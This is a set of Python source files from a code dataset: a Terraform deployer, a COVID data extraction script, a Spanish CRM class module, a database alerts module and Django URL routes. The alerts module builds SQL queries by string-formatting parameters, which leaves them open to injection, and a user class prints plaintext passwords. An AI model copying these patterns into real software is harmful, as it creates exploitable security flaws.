app):\n \"\"\"Default zip command added if not already defined.\"\"\"\n return app.commands.get(self.ZIP_CMD) or CwsZipArchiver(app)\n\n # @staticmethod\n # def generate_common_terraform_files():\n # with open('terraform/default_provider.tf', 'w') as output:\n # print('provider \"aws\" {\\nprofile = \"fpr-customer\"\\nregion = \"eu-west-1\"\\n}', file=output, flush=True)\n\n @staticmethod\n def terraform_apply(terraform, workspace, targets, traces, update_lambda_only=False):\n \"\"\"In the default terraform workspace, we have the API.\n In the specific workspace, we have the corresponding stagging lambda.\n \"\"\"\n stop = False\n\n def display_spinning_cursor():\n spinner = itertools.cycle('|/-\\\\')\n while not stop:\n sys.stdout.write(next(spinner))\n sys.stdout.write('\\b')\n sys.stdout.flush()\n sleep(0.1)\n\n spin_thread = Thread(target=display_spinning_cursor)\n spin_thread.start()\n\n try:\n if not update_lambda_only:\n print(f\"Terraform apply ({traces[0]})\", flush=True)\n terraform.apply(\"default\", targets)\n print(f\"Terraform apply ({traces[1]})\", flush=True)\n terraform.apply(workspace, targets)\n finally:\n stop = True\n\n\nclass CwsTerraformDestroyer(CwsTerraformCommand):\n\n @property\n def options(self):\n return [\n *super().options,\n click.option('--all', '-a', is_flag=True, help=\"Destroy on all workspaces.\"),\n click.option('--bucket', '-b', help=\"Bucket to remove sources zip file from.\", required=True),\n click.option('--debug', is_flag=True, help=\"Print debug logs to stderr.\"),\n click.option('--dry', is_flag=True, help=\"Doesn't perform destroy.\"),\n click.option('--key', '-k', help=\"Sources zip file bucket's name.\"),\n click.option('--profile_name', '-p', required=True, help=\"AWS credential profile.\"),\n ]\n\n @classmethod\n def multi_execute(cls, project_dir, workspace, execution_list):\n for command, options in execution_list:\n command.rm_zip(**options)\n command.terraform_destroy(**options)\n\n def __init__(self, app=None, name='destroy'):\n super().__init__(app, name=name)\n\n def rm_zip(self, *, module, bucket, key, profile_name, dry, debug, **options):\n aws_s3_session = AwsS3Session(profile_name=profile_name)\n\n # Removes zip file from S3\n key = key if key else f\"{module}-{self.app.name}\"\n if debug:\n name = f\"{module}-{options['service']}\"\n where = f\"{bucket}/{key}\"\n print(f\"Removing zip sources of {name} from s3: {where} {'(not done)' if dry else ''}\")\n\n if not dry:\n aws_s3_session.client.delete_object(Bucket=bucket, Key=key)\n aws_s3_session.client.delete_object(Bucket=bucket, Key=f\"{key}.b64sha256\")\n if debug:\n print(f\"Successfully removed sources at s3://{bucket}/{key}\")\n\n def terraform_destroy(self, *, workspace, debug, dry, **options):\n terraform = Terraform(False)\n\n all_workspaces = options['all']\n terraform_resources_filename = f\"{self.app.name}.{self.app.ms_type}.txt\"\n if not dry:\n\n # Get terraform resources\n try:\n targets = self.read_terraform_resources_list_file(terraform, terraform_resources_filename, **options)\n except OSError:\n print(f\"The resouces have been already removed ({terraform_resources_filename}).\")\n return\n\n # Destroy resources (except default)\n for w in terraform.workspace_list():\n if w in [workspace] or (all_workspaces and w != 'default'):\n print(f\"Terraform destroy ({w})\", flush=True)\n terraform.destroy(w, targets)\n\n if all_workspaces:\n\n # Remove default workspace\n # --create --dry\n terraform.destroy('default', targets)\n\n # Removes terraform resource file\n output = Path(terraform.working_dir) / terraform_resources_filename\n if debug:\n print(f\"Removing terraform resource file: {output} {'(not done)' if dry else ''}\")\n if not dry:\n output.unlink(missing_ok=True)\n\n # Removes terraform file\n terraform_filename = f\"{self.app.name}.{self.app.ms_type}.tf\"\n output = Path(terraform.working_dir) / terraform_filename\n if debug:\n print(f\"Removing terraform file: {output} {'(not done)' if dry else ''}\")\n if not dry:\n output.unlink(missing_ok=True)\n terraform_filename = f\"{self.app.name}.{self.app.ms_type}.tf\"\n msg = f\"Generate minimal destroy file for {self.app.name}\"\n self.__class__.generate_terraform_files(\"create\", self.app, terraform, \"destroy.j2\", terraform_filename,\n msg, dry=dry, debug=debug, **options)\n\n terraform.select_workspace(\"default\")\n\n\nclass Terraform:\n\n def __init__(self, init):\n from python_terraform import Terraform as PythonTerraform\n\n self.terraform = PythonTerraform(working_dir='terraform')\n Path(self.working_dir).mkdir(exist_ok=True)\n if init:\n return_code, _, err = self.terraform.init(dir_or_plan=self.working_dir)\n if return_code != 0:\n raise CwsCommandError(err)\n\n @property\n def working_dir(self):\n return self.terraform.working_dir\n\n def init(self):\n return_code, _, err = self.terraform.init()\n if return_code != 0:\n raise CwsCommandError(err)\n\n def apply(self, workspace, targets):\n self.select_workspace(workspace)\n return_code, _, err = self.terraform.apply(target=targets, skip_plan=True, input=False, raise_on_error=False,\n parallelism=1)\n if return_code != 0:\n raise CwsCommandError(err)\n\n def destroy(self, workspace, targets):\n self.select_workspace(workspace)\n return_code, _, err = self.terraform.destroy(target=targets)\n if return_code != 0:\n raise CwsCommandError(err)\n\n def output(self):\n self.select_workspace(\"default\")\n values = self.terraform.output(capture_output=True)\n return {key: value['value'] for key, value in values.items()} if values else \"{}\"\n\n def workspace_list(self):\n self.select_workspace(\"default\")\n return_code, out, err = self.terraform.cmd('workspace', 'list')\n if return_code != 0:\n raise CwsCommandError(err)\n values = out[1:].translate(str.maketrans('', '', ' \\t\\r')).split('\\n')\n return filter(None, values)\n\n def select_workspace(self, workspace):\n return_code, out, err = self.terraform.workspace('select', workspace)\n if workspace != 'default' and return_code != 0:\n _, out, err = self.terraform.workspace('new', workspace, raise_on_error=True)\n if not (Path(self.working_dir) / '.terraform').exists():\n self.terraform.init(input=False, raise_on_error=True)\n","sub_path":"coworks/cws/deployer.py","file_name":"deployer.py","file_ext":"py","file_size_in_byte":17251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"603060716","text":"import requests\nimport json\nimport urllib.parse\nimport pandas as pd\nfrom configparser import ConfigParser\nfrom datetime import datetime, timedelta\nfrom sqlalchemy import create_engine, text, Table, MetaData, Integer\nfrom sqlalchemy.orm import declarative_base, sessionmaker\nfrom sqlalchemy.schema import Column \nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\napi = \"https://api.data.gov.hk/v2/filter?q=\"\n\nparams2 = '{\"resource\":\"http://www.chp.gov.hk/files/misc/countries_areas_have_reported_cases_eng.csv\", \\\n \"section\":1,\"format\":\"json\",\"filters\":[ [1,\"eq\",[\"09/09/2021\"]] ]}'\n\n# read the read teh params in the config files\nconfigure = ConfigParser()\nprint (configure.read('config.ini'))\nprint (\"Sections : \", configure.sections())\nprint (\"api params : \", configure.get('api_params','resource'))\nprint (\"api params : \", configure.get('api_params','section'))\nprint (\"api params : \", configure.get('api_params','format'))\nprint (\"api params : \", configure.get('api_params','date_col_index'))\nprint (\"api params : \", configure.get('api_params','date_col_filter'))\n\nparams_dic = {}\nparams_dic['resource'] = configure.get('api_params','resource')\nparams_dic['section'] = configure.get('api_params','section')\nparams_dic['format'] = configure.get('api_params','format')\n\n\nfilter_list = []\nfilter_date_col = []\nfilter_date_col.append(configure.get('api_params','date_col_index')) \nfilter_date_col.append(configure.get('api_params','date_col_filter')) \nfilter_date_col.append([ (datetime.now()- timedelta( days= int(configure.get('api_params', 'date_col_time_delta') )))\\\n .strftime(\"%d/%m/%Y\") ]) \nfilter_list.append(filter_date_col)\n\nparams_dic['filters'] = filter_list \n\n\n\"\"\" \nparams_dic = {}\nparams_dic['resource'] = 'http://www.chp.gov.hk/files/misc/countries_areas_have_reported_cases_eng.csv'\nparams_dic['section'] = 1\nparams_dic['format'] = 'json'\n\n\nfilter_list = []\nfilter_date_col = []\nfilter_date_col.append(1) \nfilter_date_col.append('eq') \nfilter_date_col.append([\"09/09/2021\"]) \nfilter_list.append(filter_date_col)\n\nprint(filter_list)\n\nparams_dic['filters'] = filter_list \n\"\"\"\n\njson_param = json.dumps(params_dic)\nprint(json_param)\n\nurl = api + urllib.parse.quote_plus(json_param)\n#print(urllib.parse.quote_plus(params2))\nprint(url)\n\n\njson_data = requests.get(url).json()\n# print(json_data)\n# print(json_data)\n\n\nwith open('data/data.json', 'w') as f:\n json.dump(json_data, f)\n\nprint(json_data[1]['Countries/areas'])\n\nprint(type(json_data))\nprint(len(json_data))\n\n\njson_list = pd.read_json('data/data.json')\nprint(json_list.head(5))\nprint(type(json_list))\n\n\"\"\" for i, row in json_list.iterrows():\n print(row) \"\"\"\n\n\n\n# test the db connections\nengine = create_engine(configure.get('database_connections', 'database_conn_uri'), echo=True)\n\n# just to test the connections\nresult = engine.execute(\n text(\n \"SELECT id \\\n from covid.persons;\"\n )\n)\n\nprint(result)\nprint(f\"Selected {result.rowcount} rows.\")\nfor row in result.fetchall():\n print(row)\n\nBase = declarative_base()\n\n\nmetadata = MetaData(engine,schema=\"covid\")\nmetadata.reflect()\nprint(metadata.tables)\n \nclass persons(Base):\n __table__ = Table(\n 'persons',\n metadata,\n autoload_with=engine\n )\n\nclass persons_nopk(Base):\n __table__ = Table(\n \"persons_nopk\",\n metadata,\n Column(\"ID\", Integer, primary_key=True), \n extend_existing=True\n )\n\nSession = sessionmaker(bind=engine)\nsession = Session()\nres = session.query(persons).all()\nprint(type(res))\nfor x in range(len(res)):\n print(res[x].ID)\n print(res[x].LastName)\n print(res[x].FirstName)\n\nres = session.query(persons_nopk).all()\nprint(type(res))\nfor x in range(len(res)):\n print(res[x].ID)\n print(res[x].LastName)\n print(res[x].FirstName)\n \n\"\"\" \nnew_person = persons(\n ID = 5555,\n LastName = 'superman',\n FirstName = 'kksuperman'\n)\n\nsession.add(new_person)\nsession.commit()\n\"\"\"\nvv = session.query(persons).filter(persons.ID == 1234).first()\nprint(vv.ID)\nvv.FirstName = 'vv changed name'\nsession.commit()\n\n# data initialization\nfor x in range(1, 5):\n print(x)\n print((datetime.now() - timedelta(days = x)).strftime(\"%d/%m/%Y\"))\n\n\ndf = pd.read_sql(\"select * from covid.persons\", engine)\nprint(df.head())\n\nx = df['LastName']\ny = df['Age']\n\nsns.barplot(x = x, y =y)\nplt.show()\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191974174","text":"from enum import Enum\r\nimport colorama\r\nimport datetime\r\nimport dateutil.relativedelta as dr\r\n#from Archivos import Funciones as Fun\r\nimport Archivos.Funciones.GenerarID as Fun\r\nimport Archivos.Funciones.CargarDatos as cd\r\n\r\ndef colores():\r\n diccionario_colores = {\r\n \"lc\": colorama.Fore.LIGHTCYAN_EX,\r\n \"lr\": colorama.Fore.LIGHTRED_EX,\r\n \"lm\": colorama.Fore.LIGHTMAGENTA_EX,\r\n \"ly\": colorama.Fore.LIGHTYELLOW_EX,\r\n \"r\": colorama.Fore.RED,\r\n \"rst\": colorama.Style.RESET_ALL,\r\n \"*\": colorama.Style.BRIGHT\r\n }\r\n return diccionario_colores\r\n\r\n#----------------------------------------------------------------------------------------------------------------------#\r\n# -------------------------------------------------- Enumeraciones --------------------------------------------------- #\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass TipoCliente(Enum):\r\n Cliente = 1 # <- por defecto\r\n Sponsor = 2\r\n Proveedor = 3\r\n\r\nclass TipoActividad(Enum):\r\n Reunion = 1 # <- por defecto\r\n Llamada = 2\r\n Promocion = 3\r\n Informe = 4 # <- no es realizar un informe de gráficas, está enfocado en informar a los clientes\r\n\r\nclass TipoEtapa(Enum):\r\n Nueva = 1 # <- por defecto\r\n Propuesta = 2\r\n Calificada = 3\r\n Ganada = 4\r\n Suspendida = 5\r\n\r\nclass Departamento(Enum):\r\n Comercial = 1 # CRM / Mostrar memes comerciales / Generar PDF\r\n Administrativo = 2 # Todo\r\n Ventas = 3 # Crear/Editar/Descatalogar productos <- CSV\r\n RRHH = 4 # Registrar/Eliminar empleados <- FICHERO\r\n Salud = 5 # Registrar lesiones y actualizar lesiones a lesiones ya curadas <- opcional W.I.P\r\n\r\nclass EstatusProducto(Enum):\r\n Activo = 1 # <- por defecto, en venta\r\n Descatalogado = 2 # <- no se pueden vender productos descatalogados\r\n\r\n\r\n#----------------------------------------------------------------------------------------------------------------------#\r\n# ----------------------------------------------------- Clases ------------------------------------------------------- #\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Persona():\r\n # Una clase padre. Contiene los datos de una persona. Sirve para clientes y empleados.\r\n # No puedo crear múltiples constructores como hacía en Java, así que voy a crear solo uno,\r\n ##### con valores predeterminados que se sobreescriben solos en caso de recibirlos.\r\n # Todas las personas tienen id, pero no es lo mismo un id empleado que un id cliente, por lo que no va aquí\r\n def __init__(self, dni=None, nombre=None, apellidos=None, email=None, fecha_nacimiento=None):\r\n if email is None:\r\n self.email = \"test@test.com\"\r\n else:\r\n self.email = email\r\n\r\n if fecha_nacimiento is None:\r\n self.fecha_nacimiento = \"Unknown\"\r\n else:\r\n self.fecha_nacimiento = fecha_nacimiento\r\n\r\n if apellidos is None:\r\n self.apellidos = \"Prueba\"\r\n else:\r\n self.apellidos = apellidos\r\n\r\n if nombre is None:\r\n self.nombre = \"Test\"\r\n else:\r\n self.nombre = nombre\r\n\r\n if dni is None:\r\n self.dni = \"OOOOOOOOX\"\r\n else:\r\n self.dni = dni\r\n\r\n # Calcula la edad en base a la fecha de nacimiento. Se basa en la fecha de nacimiento\r\n def edad(self):\r\n fecha_nac = str(self.fecha_nacimiento)\r\n if fecha_nac != \"Unknown\":\r\n fecha_nac = datetime.datetime.strptime(fecha_nac, '%Y-%m-%d')\r\n hoy = datetime.datetime.today()\r\n try:\r\n cumpleanyos = fecha_nac.replace(year=hoy.year)\r\n except:\r\n cumpleanyos = fecha_nac.replace(year=hoy.year, month=fecha_nac.month + 1, day=1)\r\n if cumpleanyos > hoy:\r\n return hoy.year - fecha_nac.year - 1\r\n else:\r\n return hoy.year - fecha_nac.year\r\n else:\r\n return -1 # <- Tratar el -1 como un error\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Proveedor():\r\n def __init__(self, nif=None, nombre=None, num_ventas=None, id=None):\r\n if nif is None:\r\n self.nif = \"\"\r\n else:\r\n self.nif = nif\r\n if id is None:\r\n self.id = Fun.generar_id_proveedor()\r\n else:\r\n self.id = id\r\n if nombre is None:\r\n self.nombre = \"Error al guardar el nombre\"\r\n else:\r\n self.nombre = nombre\r\n if num_ventas is None:\r\n self.num_ventas = 0\r\n else:\r\n self.num_ventas = num_ventas\r\n\r\n def __str__(self):\r\n return \"{0} ({1}). Número de ventas: {2}\".format(str(self.nombre), str(self.nif), str(self.num_ventas))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Producto():\r\n def __init__(self, nombre=None, descripcion=None, precio=None, estatus_producto=None, proveedor=None, id=None):\r\n if id is None:\r\n self.id = Fun.generar_id_producto()\r\n else:\r\n self.id = id\r\n if nombre is None:\r\n self.nombre = \"Producto sin nombre\"\r\n else:\r\n self.nombre = nombre\r\n if descripcion is None:\r\n self.descripcion = \"\"\r\n else:\r\n self.descripcion = descripcion\r\n if precio is None:\r\n self.precio = 0.0\r\n else:\r\n self.precio = precio\r\n if estatus_producto is None:\r\n self.estatus_producto = EstatusProducto.Activo\r\n else:\r\n self.estatus_producto = estatus_producto\r\n if proveedor is None:\r\n self.proveedor = null\r\n else:\r\n if type(proveedor) is str:\r\n proveedores = cd.cargar_datos_proveedores()\r\n for prov in proveedores:\r\n if prov.id == proveedor:\r\n self.proveedor = prov\r\n else:\r\n self.proveedor = proveedor\r\n\r\n def __str__(self):\r\n return \"{0}. {1} - {2} ({3}) | {4}\".format(str(self.id), str(self.nombre), str(self.precio),\r\n str(self.estatus_producto.name), str(self.proveedor.nombre))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Cliente(Persona):\r\n # Participan en actividades.\r\n def __init__(self, dni=None, nombre=None, apellidos=None, email=None, fecha_nacimiento=None, tipocliente=None,\r\n id=None):\r\n Persona.__init__(self, dni, nombre, apellidos, email, fecha_nacimiento)\r\n if id is None:\r\n self.id = Fun.generar_id_cliente()\r\n else:\r\n self.id = id\r\n if tipocliente is None:\r\n self.tipocliente = TipoCliente.Cliente\r\n else:\r\n self.tipocliente = tipocliente\r\n\r\n def __str__(self):\r\n if self.tipocliente != TipoCliente.Cliente:\r\n return \"{0} - {1}, {2}. {3}.\".format(str(self.id), str(self.apellidos), str(self.nombre),\r\n str(self.tipocliente.name))\r\n else:\r\n return \"{0} - {1}, {2}.\".format(str(self.id), str(self.apellidos), str(self.nombre))\r\n\r\n def mostrar_info(self):\r\n c = colores()\r\n cadena = c[\"lc\"] + \"ID: \" + c[\"rst\"] + \"{0}\\n\" + c[\"lc\"] + \"DNI:\" + c[\"rst\"] + \" {1}\\n\" + c[\"lc\"] \\\r\n + \"Nombre: \" + c[\"rst\"] + \"{2}\\n\" + c[\"lc\"] + \"Apellidos: \" + c[\"rst\"] + \"{3}\\n\" \\\r\n + c[\"lc\"] + \"Fecha: \" + c[\"rst\"] + \"{4}\\n\" + c[\"lc\"] + \"Tipo: \" + c[\"rst\"] + \"{5}\"\r\n print(cadena.format(str(self.id), str(self.dni), str(self.nombre), str(self.apellidos),\r\n str(self.fecha_nacimiento), str(self.tipocliente.name)))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Empleado(Persona):\r\n # Organizan/administran actividades.\r\n def __init__(self, dni=None, nombre=None, apellidos=None, email=None, fecha_nacimiento=None, departamento=None,\r\n fecha_contratacion=None, id=None):\r\n Persona.__init__(self, dni, nombre, apellidos, email, fecha_nacimiento)\r\n if id is None:\r\n self.id = Fun.generar_id_empleado()\r\n else:\r\n self.id = id\r\n if departamento is None:\r\n self.departamento = Departamento.Comercial\r\n else:\r\n self.departamento = departamento\r\n if fecha_contratacion is None:\r\n self.fecha_contratacion = \"Unknown\"\r\n else:\r\n self.fecha_contratacion = fecha_contratacion\r\n\r\n def __str__(self):\r\n return \"{0} - {1}, {2}. {3}.\".format(str(self.id), str(self.apellidos), str(self.nombre),\r\n str(self.departamento.name))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Usuario():\r\n def __init__(self, usuario=None, contrasenya=None, empleado=None):\r\n self.usuario = usuario\r\n self.contrasenya = contrasenya\r\n self.empleado = empleado\r\n\r\n def __str__(self):\r\n return \"Usuario: {0}\\nContraseña: {1}\\nEmpleado: {2}\".format(str(self.usuario), str(self.contrasenya), str(self.empleado))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Actividad():\r\n def __init__(self, descripcion=None, fecha_vencimiento=None, fecha_planificacion=None, tipoactividad=None,\r\n id=None):\r\n if id is None:\r\n self.id = Fun.generar_id_actividad()\r\n else:\r\n self.id = id\r\n\r\n if tipoactividad is None:\r\n self.tipoactividad = TipoActividad.Reunion\r\n else:\r\n self.tipoactividad = tipoactividad\r\n\r\n if descripcion is None:\r\n self.descripcion = \"No tiene descripción.\"\r\n else:\r\n self.descripcion = descripcion\r\n\r\n if fecha_planificacion is None:\r\n self.fecha_planificacion = datetime.date.today()\r\n else:\r\n self.fecha_planificacion = fecha_planificacion\r\n\r\n if fecha_vencimiento is None:\r\n fecha = datetime.date.today()\r\n fecha = fecha + dr.relativedelta(days=7)\r\n self.fecha_vencimiento = fecha\r\n\r\n else:\r\n self.fecha_vencimiento = fecha_vencimiento\r\n\r\n def __str__(self):\r\n return \"{0} - {1}, {2}. {3}\".format(str(self.id), str(self.tipoactividad.name), str(self.fecha_vencimiento),\r\n str(self.descripcion))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Informe():\r\n # El informe relaciona la actividad con una lista de clientes (participan) y empleados (administran)\r\n def __init__(self, actividad=None, clientes=None, empleados=None, id=None):\r\n self.__actividad = actividad\r\n if id is None:\r\n self.__id = Fun.generar_id_informe()\r\n else:\r\n self.__id = id\r\n if actividad is None:\r\n self.__actividad = \"\"\r\n else:\r\n self.__actividad = actividad\r\n if clientes is None:\r\n self.__clientes = []\r\n else:\r\n self.__clientes = clientes\r\n if empleados is None:\r\n self.__empleados = []\r\n else:\r\n self.__empleados = empleados\r\n\r\n def __str__(self):\r\n return str(self.__id), str(self.__actividad)\r\n\r\n # Como quiero mostrar los clientes y empleados, en vez de to string haré una función específica\r\n def mostrar_informe(self):\r\n c = colores()\r\n print(c[\"ly\"] + \"Informe: \" + c[\"rst\"] + str(self.__id))\r\n print(c[\"ly\"] + \"Actividad: \" + c[\"rst\"] + str(self.__actividad))\r\n if len(self.__clientes) > 1:\r\n x = 1\r\n print(c[\"ly\"] + \"Lista de clientes: \" + c[\"rst\"])\r\n for cliente in self.__clientes:\r\n print(str(x) + \". \" + str(cliente))\r\n x += 1\r\n elif len(self.__clientes) > 0:\r\n print(c[\"ly\"] + \"Cliente: \" + c[\"rst\"] + str(self.__clientes[0]))\r\n else:\r\n print(c[\"lr\"] + \"Actualmente no hay clientes asociados a la actividad.\" + c[\"rst\"])\r\n if len(self.__empleados) > 1:\r\n x = 1\r\n print(c[\"ly\"] + \"Lista de empleados: \" + c[\"rst\"])\r\n for empleado in self.__empleados:\r\n print(str(x) + \". \" + str(empleado))\r\n x += 1\r\n elif len(self.__empleados) > 0:\r\n print(c[\"ly\"] + \"Empleado: \" + c[\"rst\"] + str(self.__empleados[0]))\r\n else:\r\n print(c[\"lr\"] + \"Actualmente no hay empleados asociados a la actividad.\" + c[\"rst\"])\r\n\r\n # Getters\r\n def getId(self):\r\n return self.__id\r\n def getActividad(self):\r\n return self.__actividad\r\n def getClientes(self):\r\n return self.__clientes\r\n def getEmpleados(self):\r\n return self.__empleados\r\n\r\n # Setters\r\n def setId(self, id):\r\n self.__id = id\r\n def setActividad(self, actividad):\r\n self.__actividad = actividad\r\n def setClientes(self, clientes):\r\n self.__clientes = clientes\r\n def setEmpleados(self, empleados):\r\n self.__empleados = empleados\r\n\r\n # Añadir a la lista\r\n def addCliente(self, cliente):\r\n self.__clientes.append(cliente)\r\n def addEmpleado(self, empleado):\r\n self.__empleados.append(empleado)\r\n\r\n # Eliminar de la lista\r\n def deleteCliente(self, cliente):\r\n if cliente in self.__clientes:\r\n self.__clientes.remove(cliente)\r\n return True\r\n else:\r\n return False\r\n def deleteEmpleado(self, empleado):\r\n if empleado in self.__empleados:\r\n self.__empleados.remove(empleado)\r\n return True\r\n else:\r\n return False\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Oportunidad():\r\n def __init__(self, nombre=None, informes=None, dinero_estimado=None, tipoetapa=None, id=None):\r\n if nombre is None:\r\n self.nombre = \"Sin nombre\"\r\n else:\r\n self.nombre = nombre\r\n if informes is None:\r\n self.informes = []\r\n else:\r\n self.informes = informes\r\n if dinero_estimado is None:\r\n self.dinero_estimado = 100\r\n else:\r\n self.dinero_estimado = dinero_estimado\r\n if tipoetapa is None:\r\n self.tipoetapa = TipoEtapa.Nueva\r\n else:\r\n self.tipoetapa = tipoetapa\r\n if id is None:\r\n self.id = Fun.generar_id_oportunidad()\r\n else:\r\n self.id = id\r\n\r\n def __str__(self):\r\n return \"{0} ({1}) - Etapa: {2}. Dinero estimado: {3}€\".format(str(self.nombre), str(self.id), str(self.tipoetapa.name), str(self.dinero_estimado))\r\n\r\n def addInforme(self, informe):\r\n self.informes.append(informe)\r\n def deleteInforme(self, informe):\r\n if informe in self.informes:\r\n self.informes.remove(informe)\r\n\r\n def mostrar_oportunidad(self):\r\n c = colores()\r\n print(c[\"ly\"] + \"Oportunidad: \" + c[\"rst\"] + str(self.nombre) + \"(\" + str(self.id) + \")\")\r\n if len(self.informes) > 1:\r\n x = 0\r\n print(c[\"ly\"] + \"- Lista de informes: \" + c[\"rst\"], end=\"\")\r\n for informe in self.informes:\r\n if x == 0:\r\n print(str(informe.getId()), end=\"\")\r\n else:\r\n print(\", \" + str(informe.getId()), end=\"\")\r\n x += 1\r\n elif len(self.informes) > 0:\r\n print(c[\"ly\"] + \"- Informe: \" + c[\"rst\"] + str(self.informes[0].getId()), end=\"\")\r\n else:\r\n print(c[\"lr\"] + \"Actualmente no hay informes asociados a la actividad.\" + c[\"rst\"], end=\"\")\r\n print()\r\n print(c[\"ly\"] + \"- Dinero estimado: \" + c[\"rst\"] + str(self.dinero_estimado))\r\n print(c[\"ly\"] + \"- Etapa: \" + c[\"rst\"] + str(self.tipoetapa.name))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass RegistroLesion():\r\n def __init__(self, descripcion=None, nivel_importancia=None, id=None):\r\n if descripcion is None:\r\n self.descripcion = \"Sin descripción\"\r\n else:\r\n self.descripcion = descripcion\r\n if nivel_importancia is None:\r\n self.nivel_importancia = 1\r\n else:\r\n self.nivel_importancia = nivel_importancia # Si el nivel de importancia es 0, es que ya está curada\r\n if id is None:\r\n self.id = Fun.generar_id_registroLesion()\r\n else:\r\n self.id = id\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Venta():\r\n def __init__(self, productos, cliente, empleado, precio_total=None, id=None):\r\n if id is None:\r\n self.id = Fun.generar_id_venta()\r\n else:\r\n self.id = id\r\n if precio_total is None:\r\n self.precio_total = self.calcularPrecio()\r\n else:\r\n self.precio_total = precio_total\r\n \r\n self.productos = productos\r\n self.cliente = cliente\r\n self.empleado = empleado\r\n\r\n # Calcula el precio total de la venta en el momento que se realizó (por si los precios cambian)\r\n # (me he planteado guardar el precio del momento de cada producto pero sería demasiado complejo)\r\n def calcularPrecio(self):\r\n precio_total = 0.0\r\n for producto in self.productos:\r\n precio_total += producto.precio\r\n return precio_total\r\n\r\n def __str__(self):\r\n return \"Id: {0}. Precio total: {1}. Cliente: {2}. Vendedor: {3}\".format(str(self.id), str(self.precio_total), str(self.cliente.nombre),\r\n str(self.empleado.nombre))\r\n#----------------------------------------------------------------------------------------------------------------------#\r\nclass Usuario():\r\n def __init__(self, usuario, contrasenya, empleado):\r\n self.usuario = usuario\r\n self.contrasenya = contrasenya\r\n if type(empleado) is str:\r\n empleados = cd.cargar_datos_empleados()\r\n for emple in empleados:\r\n if emple.id == empleado:\r\n self.empleado = emple\r\n else:\r\n self.empleado = empleado\r\n\r\n def __str__(self):\r\n return \"Usuario: {0}. Contraseña: {1}. Empleado asociado: {2}\".format(str(self.usuario), str(self.contrasenya),\r\n str(self.empleado.nombre))\r\n","sub_path":"Practicas/Practica 3 - Departamentos/Departamentos/venv/Archivos/Clases.py","file_name":"Clases.py","file_ext":"py","file_size_in_byte":19227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22601298","text":"from sqlalchemy import exc\r\nfrom . import db\r\n\r\n\r\nclass Alerts(db.Base):\r\n __table__ = db.Base.metadata.tables['alerts']\r\n\r\n\r\ndef check_alerts(sens_id):\r\n try:\r\n with db.engine.connect() as connection:\r\n existing_alerts = []\r\n result = connection.execute(\"select * \"\r\n \"from alerts \"\r\n \"where sensorID = '{}'\"\r\n .format(sens_id))\r\n for row in result:\r\n existing_alerts.append(row)\r\n return existing_alerts\r\n\r\n except exc.SQLAlchemyError:\r\n return False\r\n\r\n\r\ndef add_sensor_alert(acc_id, sens_id, trigger, email_alert, phone_alert):\r\n try:\r\n with db.engine.connect() as connection:\r\n checker = check_alerts(sens_id)\r\n #if len(checker) == 0 or not checker:\r\n connection.execute(\r\n \"insert into alerts (accountID, sensorID, triggerLevel, alertPhone, alertEmail)\"\r\n \"values ({}, '{}', {}, {}, {})\"\r\n .format(acc_id, sens_id, trigger, email_alert, phone_alert))\r\n return True\r\n '''\r\n else:\r\n connection.execute(\r\n \"update alerts \"\r\n \"set alerts.triggerLevel = {}, alerts.alertEmail = {}, alerts.alertPhone = {} \"\r\n \"where alerts.accountID = {} and alerts.sensorID = '{}'\"\r\n .format(trigger, email_alert, phone_alert, acc_id, sens_id))\r\n return True\r\n '''\r\n except exc.SQLAlchemyError as e:\r\n print(\">>>>>>>SQLAlchemy Error : \" + str(e))\r\n return False\r\n\r\n\r\ndef remove_alert(alert_num):\r\n try:\r\n with db.engine.connect() as connection:\r\n connection.execute(\"delete from alerts \"\r\n \"where alertsNum = %s;\", (alert_num,))\r\n return True\r\n except exc.SQLAlchemyError:\r\n return False\r\n\r\n\r\ndef set_alert_type(alert_num, new_email, new_text):\r\n try:\r\n with db.engine.connect() as connection:\r\n\r\n connection.execute(\r\n \"update alerts \"\r\n \"set alertPhone = {}, alertEmail = {} \"\r\n \"where alertsNum = {}\"\r\n .format(new_email, new_text, alert_num))\r\n\r\n return True\r\n\r\n except exc.SQLAlchemyError as e:\r\n print(e)\r\n\r\n return False\r\n","sub_path":"Website_Python_Code/flask_website/dbAPI/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644007142","text":"from django.conf.urls import url\n\n\nurlpatterns = [\n url(r'^$', 'community.views.index', name='index'),\n url(r'^board/$', 'community.views.board', name='board'),\n url(r'^board/new/$', 'community.views.post_new', name='post_new'),\n url(r'^board/(?P\\d+)/$', 'community.views.post_detail', name='post_detail'),\n url(r'^practice/$', 'community.views.practice', name='practice'),\n]\n","sub_path":"community/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"106843302","text":"import json\nimport os\nimport requests\nfrom multiprocessing import Pool, cpu_count\nfrom string import punctuation\nfrom sys import argv\nfrom time import sleep\n\n# self-explanatory\nOUTPUT_PATH = os.getcwd() + '/output/district/'\n\n# number of processors. it depends on the number of CPU\nNUM_POOL = cpu_count() - int(argv[1])\n\n# number of retries in case requests timed out\nNUM_RETRY = int(argv[2])\n\n# time interval in case requests timed out\nSLEEP_TIME = int(argv[3])\n\n# timeout duration\nTIMEOUT = int(argv[4])\n\ndef district(semester_id):\n \"\"\"\n Returns data pokok pendidikan at district level.\n\n Argument:\n - semester_id 